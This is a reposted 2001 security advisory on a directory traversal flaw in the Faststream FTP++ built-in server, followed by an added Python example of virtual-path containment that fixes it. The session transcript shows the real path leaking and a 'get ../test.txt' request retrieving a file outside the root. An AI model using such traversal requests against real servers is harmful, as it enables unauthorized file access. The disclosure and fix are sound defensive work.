From: Steve (steve@SECURESOLUTIONS.ORG)
Date: Sun Mar 04 2001 - 18:37:06 CST
-----Original Message-----
From: se00020@LION.CC
Subject: Faststream FTP++ Client 2 Beta 11 (built-in server) Vulnerability
The Faststream FTP built-in server responds with the real path of a directory instead of a virtual one. It is possible to get files outside of the root dir.
e:\crap was used as root directory
1. directory path
230 User anonymous logged in.
ftp> pwd
257 "/E:/crap/" is current directory.
2. getting files from outside of root
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt
-rw-rw-rw- 1 ftp ftp 11 Mar 02 00:29 bisontest.txt
drw-rw-rw- 1 ftp ftp 0 Mar 03 15:59 HTTP
drw-rw-rw- 1 ftp ftp 0 Mar 03 17:05 huhu
226 File sent ok
FTP: 438 Bytes empfangen in 0,00Sekunden 438000,00KB/s
ftp> get ../test.txt
200 Port command successful.
150 Opening data connection for ../test.txt.
226 File sent ok
FTP: 15 Bytes empfangen in 0,01Sekunden 1,50KB/s
Solution:
No quick fix possible. Use with care.
Author has been contacted on 04.Mar.2001
se00020@fhs-hagenberg.ac.at
se00020@lion.cc
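The two defects in the report (PWD leaking the real path "/E:/crap/", and "get ../test.txt" retrieving a file above the root) share one root cause: client-supplied paths are applied to the real directory before being confined to a virtual root. The following is an added example, not Faststream's code, of how a server should handle this: every path is resolved in a virtual namespace rooted at "/", any ".." that would climb above it is rejected, and only the validated virtual path is mapped onto the real directory. The REAL_ROOT value mirrors the advisory's e:\crap; the reply texts and function names are constructed for illustration.

```python
"""Virtual-path containment for an FTP-style server (added example)."""
from typing import Optional, Tuple

# Constructed root, mirroring the advisory's "e:\crap".
REAL_ROOT = "E:/crap"


class PathEscapesRoot(Exception):
    """A client path tried to step above the virtual root."""


def resolve_virtual(cwd: str, requested: str) -> str:
    """Return the absolute, normalized virtual path for a client request.

    cwd is the client's current virtual directory ("/" for the root).
    Backslashes count as separators because Windows clients send them.
    Raises PathEscapesRoot if ".." would go above "/".
    """
    requested = requested.replace("\\", "/")
    base = requested if requested.startswith("/") else cwd.rstrip("/") + "/" + requested
    parts = []
    for comp in base.split("/"):
        if comp in ("", "."):
            continue  # doubled slash or current directory: no effect
        if comp == "..":
            if not parts:
                raise PathEscapesRoot(requested)  # nothing exists above "/"
            parts.pop()
        else:
            parts.append(comp)
    return "/" + "/".join(parts)


def to_real(virtual: str) -> str:
    """Map a *validated* virtual path onto the real root directory.

    Only call this with resolve_virtual() output. On a live server the
    result should additionally go through os.path.realpath() so that
    junctions or symlinks under the root cannot point back outside it.
    """
    rel = virtual.strip("/")
    return REAL_ROOT + "/" + rel if rel else REAL_ROOT


def is_inside_root(cwd: str, requested: str) -> bool:
    """True if the request resolves to somewhere inside the virtual root."""
    try:
        resolve_virtual(cwd, requested)
        return True
    except PathEscapesRoot:
        return False


def pwd_response(cwd: str) -> str:
    """PWD reply built from the virtual cwd, never from the real path."""
    return f'257 "{cwd}" is current directory.'


def retr_response(cwd: str, requested: str) -> Tuple[str, Optional[str]]:
    """Reply for RETR: (FTP status line, real path to open, or None if refused)."""
    try:
        virtual = resolve_virtual(cwd, requested)
    except PathEscapesRoot:
        return f"550 {requested}: Permission denied.", None
    return f"150 Opening data connection for {virtual}.", to_real(virtual)


if __name__ == "__main__":
    # Same two requests as in the advisory, now answered safely.
    print(pwd_response("/"))                  # 257 "/" is current directory.
    print(retr_response("/", "../test.txt"))  # ('550 ../test.txt: Permission denied.', None)
    print(retr_response("/HTTP", "../huhu/x.txt"))
    # ('150 Opening data connection for /huhu/x.txt.', 'E:/crap/huhu/x.txt')
```

The key design choice is that the real root is joined last and only to an already-normalized virtual path, so no client string is ever concatenated directly onto E:/crap; PWD and directory listings then naturally show "/" and "/HTTP" rather than the on-disk location.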